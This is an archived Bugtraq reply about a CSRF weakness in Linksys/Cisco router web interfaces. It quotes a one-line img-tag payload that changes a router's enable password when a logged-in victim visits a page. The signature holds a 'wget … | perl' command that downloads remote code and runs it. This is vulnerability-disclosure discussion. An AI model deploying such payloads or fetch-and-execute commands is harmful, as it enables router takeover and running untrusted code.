Bugtraq mailing list archives
Re: Linksys WRT54 GL - Session riding (CSRF)
From: "J. Oquendo" <sil () infiltrated net>
Date: Mon, 14 Jan 2008 12:31:41 -0500
| Isn't your exploit somewhat complicated? Just put| | <imgsrc="http://192.0.2.1/level/15/configure/-/enable/secret/mypassword"/>| | on a web page, and trick the victim to visit it while he or she is| logged into the Cisco router at 192.0.2.1 over HTTP. This has been | dubbed "Cross-Site Request Forgery" a couple of years ago, but the | authors of RFC 2109 were already aware of it in 1997.
With an swf file using php one wouldn't need to trick someone entirely, just hope they don't have a pop up blocker
http://www.infiltrated.net/nojava.pimp -- ==================================================== J. Oquendo SGFA #579 (FW+VPN v4.1) SGFE #574 (FW+VPN v4.1) wget -qO - www.infiltrated.net/sig|perl http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xF684C42E
Attachment:
smime.p7s
Description: S/MIME Cryptographic Signature
Current thread:
- Linksys WRT54 GL - Session riding (CSRF) tomaz . bratusa (Jan 07)
- Re: Linksys WRT54 GL - Session riding (CSRF) Jan Heisterkamp (Jan 07)
- Re: Linksys WRT54 GL - Session riding (CSRF) Jan Heisterkamp (Jan 07)
- Re: Linksys WRT54 GL - Session riding (CSRF) Florian Weimer (Jan 11)
- RE: Linksys WRT54 GL - Session riding (CSRF) Tomaz (Jan 14)
- Re: Linksys WRT54 GL - Session riding (CSRF) J. Oquendo (Jan 14)
- Re: Linksys WRT54 GL - Session riding (CSRF) Jan Heisterkamp (Jan 15)
- Re: Linksys WRT54 GL - Session riding (CSRF) Valdis . Kletnieks (Jan 15)
- RE: Linksys WRT54 GL - Session riding (CSRF) Tomaz (Jan 14)
- <Possible follow-ups>
- Re: Linksys WRT54 GL - Session riding (CSRF) Daniel Weber (Jan 15)